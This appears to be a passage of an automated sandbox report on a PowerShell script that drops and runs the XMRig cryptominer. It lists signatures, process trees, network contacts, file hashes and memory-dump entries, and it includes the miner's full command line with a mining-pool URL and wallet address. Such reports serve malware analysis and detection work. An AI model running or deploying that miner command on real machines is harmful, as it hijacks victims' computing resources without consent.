| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4732-47-0x0000021916A30000-0x0000021916A50000-memory.dmp
memory/4732-48-0x0000021918540000-0x0000021918560000-memory.dmp
memory/4732-49-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-50-0x0000021918560000-0x0000021918580000-memory.dmp
memory/4732-51-0x0000021918580000-0x00000219185A0000-memory.dmp
memory/4732-52-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/400-53-0x00007FFE314C3000-0x00007FFE314C5000-memory.dmp
memory/400-54-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp
memory/4732-55-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/400-56-0x00007FFE314C0000-0x00007FFE31F81000-memory.dmp
memory/4732-57-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-59-0x0000021918580000-0x00000219185A0000-memory.dmp
memory/4732-58-0x0000021918560000-0x0000021918580000-memory.dmp
memory/4732-60-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-61-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-62-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-63-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-64-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-65-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-66-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-67-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-68-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-69-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-70-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-71-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-72-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-73-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-74-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-75-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-76-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-77-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-78-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-79-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-80-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-81-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-82-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-83-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-84-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-85-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-86-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-87-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-88-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-89-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-90-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-91-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-92-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-93-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-94-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-95-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-96-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-97-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-98-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-99-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-100-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-101-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-102-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-103-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-104-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-105-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-106-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-107-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-108-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-109-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-110-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-111-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-112-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-113-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-114-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-115-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-116-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-117-0x00007FF665500000-0x00007FF666133000-memory.dmp
memory/4732-118-0x00007FF665500000-0x00007FF666133000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:03
Platform
win11-20240508-en
Max time kernel
1789s
Max time network
1744s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3272 wrote to memory of 4148 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3272 wrote to memory of 4148 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/3272-0-0x00007FFFAE693000-0x00007FFFAE695000-memory.dmp
memory/3272-3-0x000001B9C6710000-0x000001B9C6732000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b2myqdn3.jjh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3272-10-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp
memory/3272-11-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp
memory/3272-12-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp
memory/3272-14-0x000001B9DEF00000-0x000001B9DEF12000-memory.dmp
memory/3272-15-0x000001B9DEEF0000-0x000001B9DEEFA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4148-46-0x000001FB62C90000-0x000001FB62CB0000-memory.dmp
memory/4148-47-0x000001FB62CE0000-0x000001FB62D00000-memory.dmp
memory/4148-48-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/3272-50-0x00007FFFAE693000-0x00007FFFAE695000-memory.dmp
memory/3272-51-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp
memory/4148-49-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-52-0x000001FB62D00000-0x000001FB62D20000-memory.dmp
memory/4148-53-0x000001FB645D0000-0x000001FB645F0000-memory.dmp
memory/4148-54-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-55-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-56-0x000001FB62D00000-0x000001FB62D20000-memory.dmp
memory/4148-57-0x000001FB645D0000-0x000001FB645F0000-memory.dmp
memory/4148-58-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-59-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-60-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-61-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-62-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-63-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-64-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-65-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-66-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-67-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-68-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-69-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-70-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-71-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-72-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-73-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-74-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-75-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-76-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-77-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-78-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-79-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-80-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-81-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-82-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-83-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-84-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-85-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-86-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-87-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-88-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-89-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-90-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-91-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-92-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-93-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-94-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-95-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-96-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-97-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-98-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-99-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-100-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-101-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-102-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-103-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-104-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-105-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-106-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-107-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-108-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-109-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-110-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-111-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-112-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-113-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-114-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-115-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
memory/4148-116-0x00007FF774570000-0x00007FF7751A3000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1765s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4888 wrote to memory of 2192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4888 wrote to memory of 2192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4888-4-0x00007FF8510D0000-0x00007FF8512AB000-memory.dmp
memory/4888-5-0x00007FF8510D0000-0x00007FF8512AB000-memory.dmp
memory/4888-6-0x00007FF8510D0000-0x00007FF8512AB000-memory.dmp
memory/4888-7-0x00000265F7CD0000-0x00000265F7CF2000-memory.dmp
memory/4888-10-0x00000265F7EE0000-0x00000265F7F56000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bns0flaf.u12.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4888-25-0x00007FF8510D0000-0x00007FF8512AB000-memory.dmp
memory/4888-48-0x00000265F7EA0000-0x00000265F7EB2000-memory.dmp
memory/4888-61-0x00000265F7D20000-0x00000265F7D2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2192-90-0x000001C13F140000-0x000001C13F160000-memory.dmp
memory/2192-91-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-92-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/4888-93-0x00007FF8510D0000-0x00007FF8512AB000-memory.dmp
memory/4888-94-0x00007FF8510D0000-0x00007FF8512AB000-memory.dmp
memory/2192-95-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-96-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-97-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-98-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-99-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-100-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-101-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-102-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-103-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-104-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-105-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-106-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-107-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-108-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-109-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-110-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-111-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-112-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-113-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-114-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-115-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-116-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-117-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-118-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-119-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-120-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-121-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-122-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-123-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-124-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-125-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-126-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-127-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-128-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-129-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-130-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-131-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-132-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-133-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-134-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-135-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-136-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-137-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-138-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-139-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-140-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-141-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-142-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-143-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-144-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-145-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-146-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-147-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-148-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
memory/2192-149-0x00007FF617B70000-0x00007FF6187A3000-memory.dmp
